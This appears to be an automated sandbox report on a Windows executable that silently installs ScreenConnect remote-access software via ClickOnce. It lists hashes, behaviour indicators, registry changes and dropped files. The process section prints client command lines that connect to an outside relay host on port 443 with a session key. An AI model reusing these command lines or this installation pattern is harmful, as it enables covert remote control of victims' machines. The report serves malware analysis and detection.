File name:

SSA_67febb55ab865.exe

Full analysis: https://app.any.run/tasks/268c504d-cb53-4a18-b605-99d100e1c3ca
Verdict: Malicious activity
Analysis date: April 15, 2025, 20:04:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rmm-tool
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

AE20C0146014433C8278E1552B9AFACC

SHA1:

D6A07FCDAAB9BC7B8A9DFFC0D3CA7693F3A11301

SHA256:

515FD3167F7EE355D819BFE0EB03ED04FBD1CAD1A469482200431279C51A857E

SSDEEP:

1536:lejLH3MVw8licIgWQog5Mzg+MoCdqQsWQcd69jPVfq7NKES:8jLHcVw8licpWQog5Ms+f+l6xPVfqnS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 8152)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Connects to unusual port

      • dfsvc.exe (PID: 6028)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 6028)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 6028)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 8152)
  • INFO

    • Checks supported languages

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads the computer name

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads the machine GUID from the registry

      • SSA_67febb55ab865.exe (PID: 5956)
      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8112)
      • ScreenConnect.ClientService.exe (PID: 8152)
      • ScreenConnect.WindowsClient.exe (PID: 6872)
      • ScreenConnect.WindowsClient.exe (PID: 4008)
    • Reads Environment values

      • dfsvc.exe (PID: 6028)
    • Disables trace logs

      • dfsvc.exe (PID: 6028)
    • Checks proxy server information

      • dfsvc.exe (PID: 6028)
    • Reads the software policy settings

      • dfsvc.exe (PID: 6028)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 6028)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 6028)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8152)
    • Process checks computer location settings

      • dfsvc.exe (PID: 6028)
      • ScreenConnect.WindowsClient.exe (PID: 8008)
    • SCREENCONNECT has been detected

      • ScreenConnect.ClientService.exe (PID: 8152)
    • Reads CPU info

      • ScreenConnect.WindowsClient.exe (PID: 4008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
9
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start ssa_67febb55ab865.exe no specs dfsvc.exe sppextcomobj.exe no specs slui.exe no specs screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
4008"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe" "RunRole" "fcaaf15c-f226-4602-bfd1-e0d74c7f517c" "System"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
SYSTEM
Company:
ScreenConnect Software
Integrity Level:
SYSTEM
Description:
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
5956"C:\Users\admin\AppData\Local\Temp\SSA_67febb55ab865.exe" C:\Users\admin\AppData\Local\Temp\SSA_67febb55ab865.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\appdata\local\temp\ssa_67febb55ab865.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
6028"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
SSA_67febb55ab865.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6872"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe" "RunRole" "c63bcf29-7882-4cca-9fc2-901167e3d9be" "User"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7288C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7320"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
8008"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.WindowsClient.exedfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
8112"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe" "?y=Guest&h=info.seac0cruree-den0ee-reei9-90.su&p=443&s=ea4b1fc8-dbce-4754-a66a-799b33ee0e44&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "5"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
8152"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe" "?y=Guest&h=info.seac0cruree-den0ee-reei9-90.su&p=443&s=ea4b1fc8-dbce-4754-a66a-799b33ee0e44&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Untitled%20Session" "5"C:\Users\admin\AppData\Local\Apps\2.0\EVOPR83B.D2B\NTECAVN6.MPY\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\evopr83b.d2b\ntecavn6.mpy\scre..tion_25b0fbb6ef7eb094_0017.0002_8a6b7152852dd739\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
Total events
8 861
Read events
8 668
Write events
161
Delete events
32

Modification events

(PID) Process:(5956) SSA_67febb55ab865.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(5956) SSA_67febb55ab865.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(5956) SSA_67febb55ab865.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(5956) SSA_67febb55ab865.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(6028) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
VW7JMXVRZ9JAAGECNBYACZND
(PID) Process:(6028) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
VW7JMXVRZ9JAAGECNBYACZND
(PID) Process:(6028) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(6028) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
EVOPR83BD2BNTECAVN6MPYQ5
(PID) Process:(6028) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
1NJN3V7ZX2ZO9XE360PTB70Y
(PID) Process:(6028) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
19
Text files
24
Unknown types
0

Dropped files

PID
Process
Filename
Type
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsClient.exe.manifestxml
MD5:9165412EE08839B9702BD4971864A133
SHA256:6BB1C1AA5663AD33EDA2256037DA8E7439502C206D4C0047270A2FD1F006BB50
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\NRZDH2BX.8QZ\67NYHD60.GR9.applicationxml
MD5:A51027818F34FC5ACA94AF3975E82112
SHA256:9BA8267A16A16228FF01A9B3AA5648B1EF4D8A99326DFCDCBEB3D20BFDC7E958
6028dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
6028dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:647EB8E6BB9D301826AE08454A55C514
SHA256:D1EDCF6F0D2D5227A6EB512530B50DBAEB7E0B8CFBD00DA0DAD47E35DA0BF91C
6028dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:BBE3662B8B338817769386FFBFC49DA5
SHA256:D0095458FE8A94608B9E6587F5F7B50F603F1743C6DED3FE5E1D3CB66373CB32
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.ClientService.exeexecutable
MD5:256081D2D140ED2727C1957317627136
SHA256:72B206D8C2EA0378F096C5E7C13022F67A0A0F670A10C1534B6F7A1BA95E8BE6
6028dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:4312835B9B682C3148B57E073EDAD193
SHA256:68CD377C79D3ECA658BB7514F3A2BC6CC0ABA1A6DC0503C7C25E6261430237E1
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:DD9D8572AC8B91F6844E9E8A28684577
SHA256:A2409879344F21A45175A17F857B4C027087200F4892810994715A189F2A6280
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
6028dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\8XOQN5M7.M4M\5PJHM7WB.BYR\ScreenConnect.Windows.dllexecutable
MD5:254D64388C6C52228D7A921960A03F6B
SHA256:05E78416A344F74095E36FF14BAA719867E9E163E1AE9A96C29DF8615748B0AE
